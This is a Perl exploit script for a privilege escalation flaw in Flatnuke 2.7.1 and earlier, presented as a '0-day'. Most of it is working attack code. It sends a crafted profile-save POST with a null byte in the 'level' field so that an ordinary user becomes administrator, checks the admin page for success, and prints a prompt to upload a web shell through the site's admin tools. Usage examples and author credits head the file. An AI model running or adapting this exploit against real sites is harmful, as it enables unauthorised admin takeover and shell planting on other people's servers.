#!/usr/bin/env perl # # Flatnuke <= 2.7.1 (level) Privilege Escalation 0-day Exploit # # Description # ----------- # Flatnuke contains one flaw that may allow a user to become administrator. # The issue is due to 'sections/none_Login/section.php' script not properly # sanitizing user input supplied to the "level" POST variable. GPC = Off # Change your rights using the null byte. Dork? Find it yourself. # ----------- # by Juri Gianni aka yeat - staker[at]hotmail[dot]it # thanks to #zeroidentity chan - http://zeroidentity.org # Aquilo,mrdotkom,p3ri0d and the other members # # http://www.youtube.com/watch?v=fCRkJb8H2mQ italian # http://www.youtube.com/watch?v=1U4KKuqdoRg english # # Usage/Example # ------------- # perl flatnuke.pl host /path username secid # perl flatnuke.pl localhost /flatnuke yeat 1ab8c9b8d33a4a4e1001d07af5565d22 # -------------
use LWP::UserAgent; use IO::Socket;
our ($host,$path,$user,$secid) = @ARGV;
if (@ARGV != 4) { print "Flatnuke <= 2.7.1 (level) Privilege Escalation 0-day Exploit\n"; Usage::Exploit(); } else { Flatnuke::Exploit(); }
sub Flatnuke::Exploit() { my ($ret,$lwp); $lwp = new LWP::UserAgent; $lwp->timeout(5); $lwp->agent('Links (2.1pre26; Linux 2.6.19-gentoo-r5 x86_64; x)'); $lwp->default_header('Cookie' => "myforum=$user; path=$path; secid=$secid; path=$path;"); $ret = $lwp->post("http://$host/$path/index.php?mod=none_Login", [ action => 'saveprofile', user => $user, hiddenmail => 'on', ava => 'blank.png', level => "\x0010", ]); if ($ret->is_success) { Flatnuke::Rights(); } }
sub Flatnuke::Rights() { my $packet; my $result; my $socket = new IO::Socket::INET( PeerAddr => $host, PeerPort => 80, Proto => 'tcp', ) or die $!; $packet .= "GET /$path/index.php?mod=none_Admin HTTP/1.1\r\n"; $packet .= "Host: $host\r\n"; $packet .= "User-Agent: Lynx (textmode)\r\n"; $packet .= "Referer: http://$host/$path/index.php?mod=none_Admin\r\n"; $packet .= "Cookie: myforum=$user; path=$path; secid=$secid; path=$path;\r\n"; $packet .= "Connection: close\r\n\r\n"; $socket->send($packet); while (<$socket>) { $result .= $_; } if ($result =~ /(livello|nivel|level|niveau) 10/i) { print "Exploit successful..you're admin\n"; print "Upload a shell on: sections/none_Admin/none_tools/webadmin.php\n"; } else { print "Exploit unsuccesful..\n"; } }
sub Usage::Exploit() { print "Usage: perl $0 host/path username secid\n"; print "RunEx: perl localhost /flatnuke yeat c3e557f271a86f893e02971b38b51653\n"; print "by staker[at]hotmail[dot]it\n"; exit; }